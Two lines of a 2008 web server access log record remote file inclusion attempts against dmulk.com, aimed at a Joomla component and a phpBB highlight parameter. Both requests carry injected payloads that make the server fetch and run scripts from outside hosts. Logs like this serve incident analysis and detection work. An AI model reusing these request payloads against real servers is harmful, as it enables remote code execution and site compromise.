67.205.7.217 - - [04/Nov/2008:11:29:20 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:29:22 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
